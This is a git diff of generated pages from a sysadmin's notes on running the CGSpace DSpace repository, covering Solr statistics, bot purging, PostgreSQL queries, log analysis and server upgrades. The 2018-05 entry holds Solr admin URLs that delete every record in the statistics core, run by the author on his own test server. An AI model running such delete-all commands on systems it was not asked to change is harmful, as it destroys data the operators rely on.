I developed in <a href="https://alanorth.github.io/cgspace-notes/cgspace-notes/2018-03/">March, 2018</a></li> +<li>Time to index ~70,000 items on CGSpace:</li> +</ul> +<pre tabindex="0"><code>$ time schedtool -D -e ionice -c2 -n7 nice -n19 [dspace]/bin/dspace index-discovery -b + +real 74m42.646s +user 8m5.056s +sys 2m7.289s +</code></pre> + + + + May, 2018 + https://alanorth.github.io/cgspace-notes/2018-05/ + Tue, 01 May 2018 16:43:54 +0300 + + https://alanorth.github.io/cgspace-notes/2018-05/ + <h2 id="2018-05-01">2018-05-01</h2> +<ul> +<li>I cleared the Solr statistics core on DSpace Test by issuing two commands directly to the Solr admin interface: +<ul> +<li>http://localhost:3000/solr/statistics/update?stream.body=%3Cdelete%3E%3Cquery%3E*:*%3C/query%3E%3C/delete%3E</li> +<li>http://localhost:3000/solr/statistics/update?stream.body=%3Ccommit/%3E</li> +</ul> +</li> +<li>Then I reduced the JVM heap size from 6144 back to 5120m</li> +<li>Also, I switched it to use OpenJDK instead of Oracle Java, as well as re-worked the <a 
href="https://github.com/ilri/rmg-ansible-public">Ansible infrastructure scripts</a> to support hosts choosing which distribution they want to use</li> +</ul> + + + + April, 2018 + https://alanorth.github.io/cgspace-notes/2018-04/ + Sun, 01 Apr 2018 16:13:54 +0200 + + https://alanorth.github.io/cgspace-notes/2018-04/ + <h2 id="2018-04-01">2018-04-01</h2> +<ul> +<li>I tried to test something on DSpace Test but noticed that it&rsquo;s down since god knows when</li> +<li>Catalina logs at least show some memory errors yesterday:</li> +</ul> + + + + March, 2018 + https://alanorth.github.io/cgspace-notes/2018-03/ + Fri, 02 Mar 2018 16:07:54 +0200 + + https://alanorth.github.io/cgspace-notes/2018-03/ + <h2 id="2018-03-02">2018-03-02</h2> +<ul> +<li>Export a CSV of the IITA community metadata for Martin Mueller</li> +</ul> + + + + February, 2018 + https://alanorth.github.io/cgspace-notes/2018-02/ + Thu, 01 Feb 2018 16:28:54 +0200 + + https://alanorth.github.io/cgspace-notes/2018-02/ + <h2 id="2018-02-01">2018-02-01</h2> +<ul> +<li>Peter gave feedback on the <code>dc.rights</code> proof of concept that I had sent him last week</li> +<li>We don&rsquo;t need to distinguish between internal and external works, so that makes it just a simple list</li> +<li>Yesterday I figured out how to monitor DSpace sessions using JMX</li> +<li>I copied the logic in the <code>jmx_tomcat_dbpools</code> provided by Ubuntu&rsquo;s <code>munin-plugins-java</code> package and used the stuff I discovered about JMX <a href="https://alanorth.github.io/cgspace-notes/cgspace-notes/2018-01/">in 2018-01</a></li> +</ul> + + + + January, 2018 + https://alanorth.github.io/cgspace-notes/2018-01/ + Tue, 02 Jan 2018 08:35:54 -0800 + + https://alanorth.github.io/cgspace-notes/2018-01/ + <h2 id="2018-01-02">2018-01-02</h2> +<ul> +<li>Uptime Robot noticed that CGSpace went down and up a few times last night, for a few minutes each time</li> +<li>I didn&rsquo;t get any load alerts from Linode and the REST and XMLUI logs don&rsquo;t show anything out of the ordinary</li> +<li>The nginx logs show HTTP 200s until <code>02/Jan/2018:11:27:17 +0000</code> when Uptime Robot got an HTTP 500</li> +<li>In dspace.log around that time I see many errors like &ldquo;Client closed the connection before file download was complete&rdquo;</li> +<li>And just before that I see this:</li> +</ul> +<pre tabindex="0"><code>Caused by: org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exec-980] Timeout: Pool empty. Unable to fetch a connection in 5 seconds, none available[size:50; busy:50; idle:0; lastwait:5000]. +</code></pre><ul> +<li>Ah hah! So the pool was actually empty!</li> +<li>I need to increase that, let&rsquo;s try to bump it up from 50 to 75</li> +<li>After that one client got an HTTP 499 but then the rest were HTTP 200, so I don&rsquo;t know what the hell Uptime Robot saw</li> +<li>I notice this error quite a few times in dspace.log:</li> +</ul> +<pre tabindex="0"><code>2018-01-02 01:21:19,137 ERROR org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer @ Error while searching for sidebar facets +org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse &#39;dateIssued_keyword:[1976+TO+1979]&#39;: Encountered &#34; &#34;]&#34; &#34;] &#34;&#34; at line 1, column 32. 
+</code></pre><ul> +<li>And there are many of these errors every day for the past month:</li> +</ul> +<pre tabindex="0"><code>$ grep -c &#34;Error while searching for sidebar facets&#34; dspace.log.* +dspace.log.2017-11-21:4 +dspace.log.2017-11-22:1 +dspace.log.2017-11-23:4 +dspace.log.2017-11-24:11 +dspace.log.2017-11-25:0 +dspace.log.2017-11-26:1 +dspace.log.2017-11-27:7 +dspace.log.2017-11-28:21 +dspace.log.2017-11-29:31 +dspace.log.2017-11-30:15 +dspace.log.2017-12-01:15 +dspace.log.2017-12-02:20 +dspace.log.2017-12-03:38 +dspace.log.2017-12-04:65 +dspace.log.2017-12-05:43 +dspace.log.2017-12-06:72 +dspace.log.2017-12-07:27 +dspace.log.2017-12-08:15 +dspace.log.2017-12-09:29 +dspace.log.2017-12-10:35 +dspace.log.2017-12-11:20 +dspace.log.2017-12-12:44 +dspace.log.2017-12-13:36 +dspace.log.2017-12-14:59 +dspace.log.2017-12-15:104 +dspace.log.2017-12-16:53 +dspace.log.2017-12-17:66 +dspace.log.2017-12-18:83 +dspace.log.2017-12-19:101 +dspace.log.2017-12-20:74 +dspace.log.2017-12-21:55 +dspace.log.2017-12-22:66 +dspace.log.2017-12-23:50 +dspace.log.2017-12-24:85 +dspace.log.2017-12-25:62 +dspace.log.2017-12-26:49 +dspace.log.2017-12-27:30 +dspace.log.2017-12-28:54 +dspace.log.2017-12-29:68 +dspace.log.2017-12-30:89 +dspace.log.2017-12-31:53 +dspace.log.2018-01-01:45 +dspace.log.2018-01-02:34 +</code></pre><ul> +<li>Danny wrote to ask for help renewing the wildcard ilri.org certificate and I advised that we should probably use Let&rsquo;s Encrypt if it&rsquo;s just a handful of domains</li> +</ul> + + + + December, 2017 + https://alanorth.github.io/cgspace-notes/2017-12/ + Fri, 01 Dec 2017 13:53:54 +0300 + + https://alanorth.github.io/cgspace-notes/2017-12/ + <h2 id="2017-12-01">2017-12-01</h2> +<ul> +<li>Uptime Robot noticed that CGSpace went down</li> +<li>The logs say &ldquo;Timeout waiting for idle object&rdquo;</li> +<li>PostgreSQL activity says there are 115 connections currently</li> +<li>The list of connections to XMLUI and REST API for today:</li> +</ul> + + + + November, 2017 + https://alanorth.github.io/cgspace-notes/2017-11/ + Thu, 02 Nov 2017 09:37:54 +0200 + + https://alanorth.github.io/cgspace-notes/2017-11/ + <h2 id="2017-11-01">2017-11-01</h2> +<ul> +<li>The CORE developers responded to say they are looking into their bot not respecting our robots.txt</li> +</ul> +<h2 id="2017-11-02">2017-11-02</h2> +<ul> +<li>Today there have been no hits by CORE and no alerts from Linode (coincidence?)</li> +</ul> +<pre tabindex="0"><code># grep -c &#34;CORE&#34; /var/log/nginx/access.log +0 +</code></pre><ul> +<li>Generate list of authors on CGSpace for Peter to go through and correct:</li> +</ul> +<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv; +COPY 54701 +</code></pre> + + + + October, 2017 + https://alanorth.github.io/cgspace-notes/2017-10/ + Sun, 01 Oct 2017 08:07:54 +0300 + + https://alanorth.github.io/cgspace-notes/2017-10/ + <h2 id="2017-10-01">2017-10-01</h2> +<ul> +<li>Peter emailed to point out that many items in the <a href="https://cgspace.cgiar.org/handle/10568/2703">ILRI archive collection</a> have multiple handles:</li> +</ul> +<pre tabindex="0"><code>http://hdl.handle.net/10568/78495||http://hdl.handle.net/10568/79336 +</code></pre><ul> +<li>There appears to be a pattern 
but I&rsquo;ll have to look a bit closer and try to clean them up automatically, either in SQL or in OpenRefine</li> +<li>Add Katherine Lutz to the groups for content submission and edit steps of the CGIAR System collections</li> +</ul> + + + + CGIAR Library Migration + https://alanorth.github.io/cgspace-notes/cgiar-library-migration/ + Mon, 18 Sep 2017 16:38:35 +0300 + + https://alanorth.github.io/cgspace-notes/cgiar-library-migration/ + <p>Rough notes for importing the CGIAR Library content. It was decided that this content would go to a new top-level community called <em>CGIAR System Organization</em>.</p> + + + + diff --git a/docs/categories/notes/page/1/index.html b/docs/categories/notes/page/1/index.html new file mode 100644 index 000000000..16efd964c --- /dev/null +++ b/docs/categories/notes/page/1/index.html @@ -0,0 +1,10 @@ + + + + https://alanorth.github.io/cgspace-notes/categories/notes/ + + + + + + diff --git a/docs/categories/notes/page/2/index.html b/docs/categories/notes/page/2/index.html new file mode 100644 index 000000000..eeadd59a4 --- /dev/null +++ b/docs/categories/notes/page/2/index.html @@ -0,0 +1,434 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + CGSpace Notes + + + + + + + + + + + + + + + + + + + + + + +
+
+ +
+
+ + + + +
+
+

CGSpace Notes

+

Documenting day-to-day work on the CGSpace repository.

+
+
+ + + + +
+
+
+ + + + + + + + +
+
+

September, 2022

+ +
+

2022-09-01

+
    +
  • A bit of work on the “Mapping CG Core–CGSpace–MEL–MARLO Types” spreadsheet
  • +
  • I tested an item submission on DSpace Test with the Cocoon org.apache.cocoon.uploads.autosave=false change +
      +
    • The submission works as expected
    • +
    +
  • +
  • Start debugging some region-related issues with csv-metadata-quality +
      +
    • I created a new test file test-geography.csv with some different scenarios
    • +
    • I also fixed a few bugs and improved the region-matching logic
    • +
    +
  • +
+ Read more → +
+ + + + + + + + + + + + + +
+
+

July, 2022

+ +
+

2022-07-02

+
    +
  • I learned how to use the Levenshtein functions in PostgreSQL +
      +
    • The thing is that there is a limit of 255 characters for these functions in PostgreSQL so you need to truncate the strings before comparing
    • +
    • Also, the trgm functions I’ve used before are case insensitive, but Levenshtein is not, so you need to make sure to lower case both strings first
    • +
    +
  • +
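A minimal sketch of that kind of comparison, assuming the fuzzystrmatch extension (which provides levenshtein()) is installed; the strings are only illustrative:
+
dspace=# CREATE EXTENSION IF NOT EXISTS fuzzystrmatch;
+dspace=# SELECT levenshtein(LOWER(LEFT('CGIAR Research Program on Livestock', 255)), LOWER(LEFT('cgiar research program on livestock and fish', 255)));
+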
+ Read more → +
+ + + + + + +
+
+

June, 2022

+ +
+

2022-06-06

+
    +
  • Look at the Solr statistics on CGSpace +
      +
    • I see 167,000 hits from a bunch of Microsoft IPs with reverse DNS “msnbot-” using the Solr query dns:*msnbot* AND dns:*.msn.com
    • +
    • I purged these first so I could see the other “real” IPs in the Solr facets (a purge query is sketched after this list)
    • +
    +
  • +
  • I see 47,500 hits from 80.248.237.167 on a data center ISP in Sweden, using a normal user agent
  • +
  • I see 13,000 hits from 163.237.216.11 on a data center ISP in Australia, using a normal user agent
  • +
  • I see 7,300 hits from 208.185.238.57 from Britannica, using a normal user agent +
      +
    • There seem to be many more of these:
    • +
    +
  • +
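One way to purge such hits directly, instead of with the helper scripts used elsewhere in these notes, is a Solr delete-by-query against the statistics core; the host and port are assumptions that depend on the local Solr setup:
+
$ curl -s 'http://localhost:8983/solr/statistics/update?commit=true' -H 'Content-Type: text/xml' --data-binary '<delete><query>dns:*msnbot* AND dns:*.msn.com</query></delete>'
+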
+ Read more → +
+ + + + + + +
+
+

May, 2022

+ +
+

2022-05-04

+
    +
  • I found a few more IPs making requests using the shady Chrome 44 user agent in the last few days so I will add them to the block list too: +
      +
    • 18.207.136.176
    • +
    • 185.189.36.248
    • +
    • 50.118.223.78
    • +
    • 52.70.76.123
    • +
    • 3.236.10.11
    • +
    +
  • +
  • Looking at the Solr statistics for 2022-04 +
      +
    • 52.191.137.59 is Microsoft, but they are using a normal user agent and making tens of thousands of requests
    • +
    • 64.39.98.62 is owned by Qualys, and all their requests are probing for /etc/passwd etc
    • +
    • 185.192.69.15 is in the Netherlands and is using a normal user agent, but making excessive automated HTTP requests to paths forbidden in robots.txt
    • +
    • 157.55.39.159 is owned by Microsoft and identifies as bingbot so I don’t know why its requests were logged in Solr
    • +
    • 52.233.67.176 is owned by Microsoft and uses a normal user agent, but making excessive automated HTTP requests
    • +
    • 157.55.39.144 is owned by Microsoft and uses a normal user agent, but making excessive automated HTTP requests
    • +
    • 207.46.13.177 is owned by Microsoft and identifies as bingbot so I don’t know why its requests were logged in Solr
    • +
    • If I query Solr for time:2022-04* AND dns:*msnbot* AND dns:*.msn.com. I see a handful of IPs that made 41,000 requests
    • +
    +
  • +
  • I purged 93,974 hits from these IPs using my check-spider-ip-hits.sh script
  • +
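The purge itself was presumably something like the following, assuming check-spider-ip-hits.sh takes a file of IP addresses with -f and a purge flag -p like the check-spider-hits.sh script shown elsewhere in these notes, with /tmp/ips holding the offending addresses:
+
$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips -p
+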
+ Read more → +
+ + + + + + +
+
+

April, 2022

+ +
+ 2022-04-01 I did G1GC tests on DSpace Test (linode26) to complement the CMS tests I did yesterday The Discovery indexing took this long: real 334m33.625s user 227m51.331s sys 3m43.037s 2022-04-04 Start a full harvest on AReS Help Marianne with submit/approve access on a new collection on CGSpace Go back in Gaia’s batch reports to find records that she indicated for replacing on CGSpace (ie, those with better new copies, new versions, etc) Looking at the Solr statistics for 2022-03 on CGSpace I see 54.
+ + + + + + +
+
+

March, 2022

+ +
+

2022-03-01

+
    +
  • Send Gaia the last batch of potential duplicates for items 701 to 980:
  • +
+
$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4.csv
+$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p 'fuuu' -o /tmp/2022-03-01-tac-batch4-701-980.csv
+$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4-filenames.csv
+$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv > /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
+
+ Read more → +
+ + + + + + +
+
+

February, 2022

+ +
+

2022-02-01

+
    +
  • Meeting with Peter and Abenet about CGSpace in the One CGIAR +
      +
    • We agreed to buy $5,000 worth of credits from Atmire for future upgrades
    • +
    • We agreed to move CRPs and non-CGIAR communities off the home page, as well as some other things for the CGIAR System Organization
    • +
    • We agreed to make a Discovery facet for CGIAR Action Areas above the existing CGIAR Impact Areas one
    • +
    • We agreed to try to do more alignment of affiliations/funders with ROR
    • +
    +
  • +
+ Read more → +
+ + + + + + + + + + + + + +
+
+

December, 2021

+ +
+

2021-12-01

+
    +
  • Atmire merged some changes I had submitted to the COUNTER-Robots project
  • +
  • I updated our local spider user agents and then re-ran the list with my check-spider-hits.sh script on CGSpace:
  • +
+
$ ./ilri/check-spider-hits.sh -f /tmp/agents -p  
+Purging 1989 hits from The Knowledge AI in statistics
+Purging 1235 hits from MaCoCu in statistics
+Purging 455 hits from WhatsApp in statistics
+
+Total number of bot hits purged: 3679
+
+ Read more → +
+ + + + + + + + + + + +
+ + + + +
+
+ + + + + + + + + diff --git a/docs/categories/notes/page/3/index.html b/docs/categories/notes/page/3/index.html new file mode 100644 index 000000000..b6025d201 --- /dev/null +++ b/docs/categories/notes/page/3/index.html @@ -0,0 +1,429 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + CGSpace Notes + + + + + + + + + + + + + + + + + + + + + + +
+
+ +
+
+ + + + +
+
+

CGSpace Notes

+

Documenting day-to-day work on the CGSpace repository.

+
+
+ + + + +
+
+
+ + + + + + + + +
+
+

November, 2021

+ +
+

2021-11-02

+
    +
  • I experimented with manually sharding the Solr statistics on DSpace Test
  • +
  • First I exported all the 2019 stats from CGSpace:
  • +
+
$ ./run.sh -s http://localhost:8081/solr/statistics -f 'time:2019-*' -a export -o statistics-2019.json -k uid
+$ zstd statistics-2019.json
+
+ Read more → +
+ + + + + + +
+
+

October, 2021

+ +
+

2021-10-01

+
    +
  • Export all affiliations on CGSpace and run them against the latest RoR data dump:
  • +
+
localhost/dspace63= > \COPY (SELECT DISTINCT text_value as "cg.contributor.affiliation", count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-10-01-affiliations.csv WITH CSV HEADER;
+$ csvcut -c 1 /tmp/2021-10-01-affiliations.csv | sed 1d > /tmp/2021-10-01-affiliations.txt
+$ ./ilri/ror-lookup.py -i /tmp/2021-10-01-affiliations.txt -r 2021-09-23-ror-data.json -o /tmp/2021-10-01-affili
+ations-matching.csv
+$ csvgrep -c matched -m true /tmp/2021-10-01-affiliations-matching.csv | sed 1d | wc -l 
+1879
+$ wc -l /tmp/2021-10-01-affiliations.txt 
+7100 /tmp/2021-10-01-affiliations.txt
+
    +
  • So we have 1879/7100 (26.46%) matching already
  • +
+ Read more → +
+ + + + + + +
+
+

September, 2021

+ +
+

2021-09-02

+
    +
  • Troubleshooting the missing Altmetric scores on AReS +
      +
    • Turns out that I didn’t actually fix them last month because the check for content.altmetric still exists, and I can’t access the DOIs using _h.source.DOI for some reason
    • +
    • I can access all other kinds of item metadata using the Elasticsearch label, but not DOI!!!
    • +
    • I will change DOI to tomato in the repository setup and start a re-harvest… I need to see if this is some kind of reserved word or something…
    • +
    • Even as tomato I can’t access that field as _h.source.tomato in Angular, but it does work as a filter source… sigh
    • +
    +
  • +
  • I’m having problems using the OpenRXV API +
      +
    • The syntax Moayad showed me last month doesn’t seem to honor the search query properly…
    • +
    +
  • +
+ Read more → +
+ + + + + + +
+
+

August, 2021

+ +
+

2021-08-01

+
    +
  • Update Docker images on AReS server (linode20) and reboot the server:
  • +
+
# docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | grep -v none | xargs -L1 docker pull
+
    +
  • I decided to upgrade linode20 from Ubuntu 18.04 to 20.04
  • +
+ Read more → +
+ + + + + + +
+
+

July, 2021

+ +
+

2021-07-01

+
    +
  • Export another list of ALL subjects on CGSpace, including AGROVOC and non-AGROVOC for Enrico:
  • +
+
localhost/dspace63= > \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-01-all-subjects.csv WITH CSV HEADER;
+COPY 20994
+
+ Read more → +
+ + + + + + +
+
+

June, 2021

+ +
+

2021-06-01

+
    +
  • IWMI notified me that AReS was down with an HTTP 502 error +
      +
    • Looking at UptimeRobot I see it has been down for 33 hours, but I never got a notification
    • +
    • I don’t see anything in the Elasticsearch container logs, or the systemd journal on the host, but I notice that the angular_nginx container isn’t running
    • +
    • I simply started it and AReS was running again:
    • +
    +
  • +
+ Read more → +
+ + + + + + +
+
+

May, 2021

+ +
+

2021-05-01

+
    +
  • I looked at the top user agents and IPs in the Solr statistics for last month and I see these user agents: +
      +
    • “RI/1.0”, 1337
    • +
    • “Microsoft Office Word 2014”, 941
    • +
    +
  • +
  • I will add the RI/1.0 pattern to our DSpace agent overrides and purge them from Solr (we had previously seen this agent with 9,000 hits or so in 2020-09), but I think I will leave the Microsoft Word one… as that’s an actual user…
  • +
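A sketch of what that purge would look like with the check-spider-hits.sh script used elsewhere in these notes; the pattern file name is arbitrary and the exact pattern syntax depends on what the script expects:
+
$ echo 'RI/1.0' > /tmp/agents
+$ ./ilri/check-spider-hits.sh -f /tmp/agents -p
+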
+ Read more → +
+ + + + + + +
+
+

April, 2021

+ +
+

2021-04-01

+
    +
  • I wrote a script to query Sherpa’s API for our ISSNs: sherpa-issn-lookup.py +
      +
    • I’m curious to see how the results compare with the results from Crossref yesterday
    • +
    +
  • +
  • AReS Explorer was down since this morning, I didn’t see anything in the systemd journal +
      +
    • I simply took everything down with docker-compose and then back up, and then it was OK
    • +
    • Perhaps one of the containers crashed, I should have looked closer but I was in a hurry
    • +
    +
  • +
+ Read more → +
+ + + + + + +
+
+

March, 2021

+ +
+

2021-03-01

+
    +
  • Discuss some OpenRXV issues with Abdullah from CodeObia +
      +
    • He’s trying to work on the DSpace 6+ metadata schema autoimport using the DSpace 6+ REST API
    • +
    • Also, we found some issues building and running OpenRXV currently due to ecosystem shift in the Node.js dependencies
    • +
    +
  • +
+ Read more → +
+ + + + + + + + + + + + + + + + + + +
+ + + + +
+
+ + + + + + + + + diff --git a/docs/categories/notes/page/4/index.html b/docs/categories/notes/page/4/index.html new file mode 100644 index 000000000..58bfc6eed --- /dev/null +++ b/docs/categories/notes/page/4/index.html @@ -0,0 +1,449 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + CGSpace Notes + + + + + + + + + + + + + + + + + + + + + + +
+
+ +
+
+ + + + +
+
+

CGSpace Notes

+

Documenting day-to-day work on the CGSpace repository.

+
+
+ + + + +
+
+
+ + + + + + + + +
+
+

February, 2021

+ +
+

2021-02-01

+
    +
  • Abenet said that CIP found more duplicate records in their export from AReS + +
  • +
  • I had a call with CodeObia to discuss the work on OpenRXV
  • +
  • Check the results of the AReS harvesting from last night:
  • +
+
$ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
+{
+  "count" : 100875,
+  "_shards" : {
+    "total" : 1,
+    "successful" : 1,
+    "skipped" : 0,
+    "failed" : 0
+  }
+}
+
+ Read more → +
+ + + + + + +
+
+

January, 2021

+ +
+

2021-01-03

+
    +
  • Peter notified me that some filters on AReS were broken again +
      +
    • It’s the same issue with the field names getting .keyword appended to the end that I already filed an issue on OpenRXV about last month
    • +
    • I fixed the broken filters (careful to not edit any others, lest they break too!)
    • +
    +
  • +
  • Fix an issue with start page number for the DSpace REST API and statistics API in OpenRXV +
      +
    • The start page had been “1” in the UI, but in the backend they were doing some gymnastics to adjust to the zero-based offset/limit/page of the DSpace REST API and the statistics API (a quick check against the REST API is sketched after this list)
    • +
    • I adjusted it to default to 0 and added a note to the admin screen
    • +
    • I realized that this issue was actually causing the first page of 100 statistics to be missing…
    • +
    • For example, this item has 51 views on CGSpace, but 0 on AReS
    • +
    +
  • +
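A quick way to confirm the zero-based behaviour against the DSpace REST API (the hostname is only an example): the first hundred items live at offset=0, so a UI “page 1” has to map to offset 0 rather than 100:
+
$ curl -s -H 'Accept: application/json' 'https://dspacetest.cgiar.org/rest/items?offset=0&limit=100'
+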
+ Read more → +
+ + + + + + +
+
+

December, 2020

+ +
+

2020-12-01

+
    +
  • Atmire responded about the issue with duplicate data in our Solr statistics +
      +
    • They noticed that some records in the statistics-2015 core haven’t been migrated with the AtomicStatisticsUpdateCLI tool yet and assumed that I haven’t migrated any of the records yet
    • +
    • That’s strange, as I checked all ten cores and 2015 is the only one with some unmigrated documents, according to the cua_version field
    • +
    • I started processing those (about 411,000 records):
    • +
    +
  • +
+ Read more → +
+ + + + + + + + + + + + + +
+
+

November, 2020

+ +
+

2020-11-01

+
    +
  • Continue with processing the statistics-2019 Solr core with the AtomicStatisticsUpdateCLI tool on DSpace Test +
      +
    • So far we’ve spent at least fifty hours to process the statistics and statistics-2019 cores… wow.
    • +
    +
  • +
+ Read more → +
+ + + + + + +
+
+

October, 2020

+ +
+

2020-10-06

+
    +
  • Add tests for the new /items POST handlers to the DSpace 6.x branch of my dspace-statistics-api + +
  • +
  • Trying to test the changes Atmire sent last week but I had to re-create my local database from a recent CGSpace dump +
      +
    • During the FlywayDB migration I got an error:
    • +
    +
  • +
+ Read more → +
+ + + + + + +
+
+

September, 2020

+ +
+

2020-09-02

+
    +
  • Replace Marissa van Epp with Rhys Bucknall in the CCAFS groups on CGSpace because Marissa no longer works at CCAFS
  • +
  • The AReS Explorer hasn’t updated its index since 2020-08-22 when I last forced it +
      +
    • I restarted it again now and told Moayad that the automatic indexing isn’t working
    • +
    +
  • +
  • Add Alliance of Bioversity International and CIAT to affiliations on CGSpace
  • +
  • Abenet told me that the general search text on AReS doesn’t get reset when you use the “Reset Filters” button + +
  • +
  • I filed an issue on OpenRXV to make some minor edits to the admin UI: https://github.com/ilri/OpenRXV/issues/40
  • +
+ Read more → +
+ + + + + + +
+
+

August, 2020

+ +
+

2020-08-02

+
    +
  • I spent a few days working on a Java-based curation task to tag items with ISO 3166-1 Alpha2 country codes based on their cg.coverage.country text values +
      +
    • It looks up the names in ISO 3166-1 first, and then in our CGSpace countries mapping (which has five or so of Peter’s preferred “display” country names)
    • +
    • It implements a “force” mode too that will clear existing country codes and re-tag everything
    • +
    • It is class based so I can easily add support for other vocabularies, and the technique could even be used for organizations with mappings to ROR and Clarisa…
    • +
    +
  • +
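Running such a task would presumably use the standard DSpace curation CLI; the task name and target here are assumptions, not the exact invocation used:
+
$ dspace curate -t countrycodetagger -i <community-handle> -r -
+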
+ Read more → +
+ + + + + + +
+
+

July, 2020

+ +
+

2020-07-01

+
    +
  • A few users noticed that CGSpace wasn’t loading items today, item pages seem blank +
      +
    • I looked at the PostgreSQL locks but they don’t seem unusual
    • +
    • I guess this is the same “blank item page” issue that we had a few times in 2019 that we never solved
    • +
    • I restarted Tomcat and PostgreSQL and the issue was gone
    • +
    +
  • +
  • Since I was restarting Tomcat anyways I decided to redeploy the latest changes from the 5_x-prod branch and I added a note about COVID-19 items to the CGSpace frontpage at Peter’s request
  • +
+ Read more → +
+ + + + + + +
+
+

June, 2020

+ +
+

2020-06-01

+
    +
  • I tried to run the AtomicStatisticsUpdateCLI CUA migration script on DSpace Test (linode26) again and it is still going very slowly and has tons of errors like I noticed yesterday +
      +
    • I sent Atmire the dspace.log from today and told them to log into the server to debug the process
    • +
    +
  • +
  • In other news, I checked the statistics API on DSpace 6 and it’s working
  • +
  • I tried to build the OAI registry on the freshly migrated DSpace 6 on DSpace Test and I get an error:
  • +
+ Read more → +
+ + + + + + + + + + + +
+ + + + +
+
+ + + + + + + + + diff --git a/docs/categories/notes/page/5/index.html b/docs/categories/notes/page/5/index.html new file mode 100644 index 000000000..44dd15b3e --- /dev/null +++ b/docs/categories/notes/page/5/index.html @@ -0,0 +1,477 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + CGSpace Notes + + + + + + + + + + + + + + + + + + + + + + +
+
+ +
+
+ + + + +
+
+

CGSpace Notes

+

Documenting day-to-day work on the CGSpace repository.

+
+
+ + + + +
+
+
+ + + + + + + + +
+
+

May, 2020

+ +
+

2020-05-02

+
    +
  • Peter said that CTA is having problems submitting an item to CGSpace +
      +
    • Looking at the PostgreSQL stats it seems to be the same issue that Tezira was having last week, as I see the number of connections in ‘idle in transaction’ and ‘waiting for lock’ state are increasing again
    • +
    • I see that CGSpace (linode18) is still using PostgreSQL JDBC driver version 42.2.11, and there were some bugs related to transactions fixed in 42.2.12 (which I had updated in the Ansible playbooks, but not deployed yet)
    • +
    +
  • +
+ Read more → +
+ + + + + + +
+
+

April, 2020

+ +
+

2020-04-02

+
    +
  • Maria asked me to update Charles Staver’s ORCID iD in the submission template and on CGSpace, as his name was lower case before, and now he has corrected it +
      +
    • I updated the fifty-eight existing items on CGSpace
    • +
    +
  • +
  • Looking into the items Udana had asked about last week that were missing Altmetric donuts: + +
  • +
  • On the same note, the one item Abenet pointed out last week now has a donut with score of 104 after I tweeted it last week
  • +
+ Read more → +
+ + + + + + + + + + + + + +
+
+

February, 2020

+ +
+

2020-02-02

+
    +
  • Continue working on porting CGSpace’s DSpace 5 code to DSpace 6.3 that I started yesterday +
      +
    • Sign up for an account with MaxMind so I can get the GeoLite2-City.mmdb database
    • +
    • I still need to wire up the API credentials and cron job into the Ansible infrastructure playbooks
    • +
    • Fix some minor issues in the config and XMLUI themes, like removing Atmire stuff
    • +
    • The code finally builds and runs with a fresh install
    • +
    +
  • +
+ Read more → +
+ + + + + + +
+
+

January, 2020

+ +
+

2020-01-06

+
    +
  • Open a ticket with Atmire to request a quote for the upgrade to DSpace 6
  • +
  • Last week Altmetric responded about the item that had a lower score than its DOI +
      +
    • The score is now linked to the DOI
    • +
    • Another item that had the same problem in 2019 has now also linked to the score for its DOI
    • +
    • Another item that had the same problem in 2019 has also been fixed
    • +
    +
  • +
+

2020-01-07

+
    +
  • Peter Ballantyne highlighted one more WLE item that is missing the Altmetric score that its DOI has +
      +
    • The DOI has a score of 259, but the Handle has no score at all
    • +
    • I tweeted the CGSpace repository link
    • +
    +
  • +
+ Read more → +
+ + + + + + +
+
+

December, 2019

+ +
+

2019-12-01

+
    +
  • Upgrade CGSpace (linode18) to Ubuntu 18.04: +
      +
    • Check any packages that have residual configs and purge them:
    • +
    • # dpkg -l | grep -E '^rc' | awk '{print $2}' | xargs dpkg -P
    • +
    • Make sure all packages are up to date and the package manager is up to date, then reboot:
    • +
    +
  • +
+
# apt update && apt full-upgrade
+# apt-get autoremove && apt-get autoclean
+# dpkg -C
+# reboot
+
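The distribution upgrade itself is cut off in this summary; after those preparation steps the generic Ubuntu procedure would be something like:
+
# apt install update-manager-core
+# do-release-upgrade
+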
+ Read more → +
+ + + + + + +
+
+

November, 2019

+ +
+

2019-11-04

+
    +
  • Peter noticed that there were 5.2 million hits on CGSpace in 2019-10 according to the Atmire usage statistics +
      +
    • I looked in the nginx logs and see 4.6 million in the access logs, and 1.2 million in the API logs:
    • +
    +
  • +
+
# zcat --force /var/log/nginx/*access.log.*.gz | grep -cE "[0-9]{1,2}/Oct/2019"
+4671942
+# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE "[0-9]{1,2}/Oct/2019"
+1277694
+
    +
  • So 4.6 million from XMLUI and another 1.2 million from API requests
  • +
  • Let’s see how many of the REST API requests were for bitstreams (because they are counted in Solr stats):
  • +
+
